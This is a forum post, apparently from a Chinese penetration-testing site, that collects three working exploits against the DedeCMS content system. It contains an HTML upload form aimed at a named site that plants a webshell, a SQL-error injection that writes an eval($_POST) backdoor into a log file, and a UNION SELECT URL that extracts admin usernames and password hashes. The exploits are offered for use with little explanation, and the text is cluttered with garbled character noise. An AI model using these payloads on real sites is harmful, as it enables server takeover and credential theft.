3 S. p; D% \6 l1 N$ i1 x: K; x- K0 o, `! p

  h. d8 B6 A; l# l
  c7 d+ O6 U# ~8 o4 [$ n
! B+ s* [  P" S4 B1 K5 ^* ]1 p0 r7 P% D1 R1 D
4 ~7 R3 D# l: L3 T' z: i/ p
: l( _) T% e" `* C+ k+ ~
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
1 w" Q6 M; L  d+ \9 c/ X<html>
4 \7 t; w/ J& t4 Z' f& A<head>9 X$ u( b+ J! Z0 q. E- w" L; I
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
- ]8 h0 f- [+ K4 Y: p1 H5 J, m" c/ `1 E</head>
6 A  W7 G3 N2 r<body style="FONT-SIZE: 9pt">
( _% j0 a$ x  p$ h---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
4 V$ w8 u' E) O2 A<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>% P* o9 v7 s3 S
<input type='hidden' name='activepath' value='/data/cache/' />% [5 j  H# e! S0 r) g- B& U
<input type='hidden' name='cfg_basedir' value='../../' />8 i  n: N5 A' n& s* j# c
<input type='hidden' name='cfg_imgtype' value='php' />$ V& Y4 D- D+ }! N. E0 T2 R
<input type='hidden' name='cfg_not_allowall' value='txt' />* |4 H" M  h; R: t
<input type='hidden' name='cfg_softtype' value='php' />' L& Y. `& n. F- C) A
<input type='hidden' name='cfg_mediatype' value='php' />) g" v/ Y5 G) A7 p
<input type='hidden' name='f' value='form1.enclosure' />  C' e8 ~) u% q% G6 D+ i3 Q7 M5 c
<input type='hidden' name='job' value='upload' />. y& e, v, f4 n- d
<input type='hidden' name='newname' value='fly.php' />; r1 h' ?/ ]0 v; H
Select U Shell <input type='file' name='uploadfile' size='25' />
/ n& ~! ]* O7 l0 ^9 K' L+ A0 c<input type='submit' name='sb1' value='确定' />( d* @( s/ W4 b  A5 _. c: G
</form>+ ?0 |" j6 k4 [8 E3 c& q
<br />It's just a exp for the bug of Dedecms V55...<br />1 D& Z3 c6 h% g
Need register_globals = on...<br />
, b8 V6 A0 V+ K8 f4 i4 V" z) ?4 d2 nFun the game,get a webshell at /data/cache/fly.php...<br />; Z% t) @4 S. y4 R) \' U# i
</body>' p% |% D9 C- T# n# x- w
</html>
" S0 @6 x8 _8 R. I! p- j3 L( l+ K6 N8 s" K; v$ \' X9 [

9 I# R: j5 O/ x7 m" j4 [+ U7 B: p6 b+ n, n
4 d# p) k- l- W! K: ]# J9 q% D
* R2 t5 {, k3 X5 A8 V. f
! Z3 i# o+ S% I/ ^* z' x
+ I2 [6 L6 C+ J: k! M/ ]1 C4 n6 i
- N1 W5 z6 `& {2 X1 A

. i- Z% `+ h/ \+ ~7 v, O. |, J
- \% l+ o0 g7 C织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
0 M* f: R. e1 R& Q* V利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
+ w  d+ D% C  E9 T# o+ w0 M1. 访问网址:$ l2 h7 K, k3 |" }1 R
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
: s/ t, _* r5 C3 T8 K可看见错误信息
' v, O; d9 r- U! a
; r( ~: [1 I* W: Z  m# ^# z7 O
6 W% v2 R9 f" G2 O/ y- @: e. `2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
7 a8 A! i  M, Eint(3) Error: Illegal double '1024e1024' value found during parsing. e# \- L  u2 X4 p9 d+ |0 S
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>7 \8 E0 B) Y0 m8 W$ w4 G  f) S

8 [8 [6 f2 i: U" A$ k1 Y- D6 f. _, Z6 N8 x
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
; [1 y( w6 e6 p( E8 i( W
' }' @* j8 H3 a6 v& R: Y2 @8 `  ?& z$ Z" @  f* Z8 z/ s5 L
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
  R5 e# s1 x5 o4 Q! @
% I$ W0 R) o8 g) A6 J& C; R6 G- `. {6 j
- j; K2 B) _+ X' k: |" A按确定后的看到第2步骤的信息表示文件木马上传成功.) k5 u! H" u9 s1 j5 l6 A( @

% q" x# g+ ?9 L5 B5 p9 m# n
/ K6 O: S# T0 s) u$ P. ]) x$ G& E9 c( r- |* c3 K
( S" b# d5 p4 `8 C

  E, F* c! d* E' P9 F2 P' E3 G' ]: u( H* D& b% z  a: Z/ E
$ O, f6 G9 G& s1 Q* I

9 {9 |! s; o+ ]0 B- @4 M, f) P7 ]! [
: y' G" S  h+ C4 v
# U1 d( {9 Q3 d/ a' `

. T6 H" q6 O6 |3 G织梦(DedeCms)plus/infosearch.php 文件注入漏洞* o3 G. |! V! K* R/ M
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2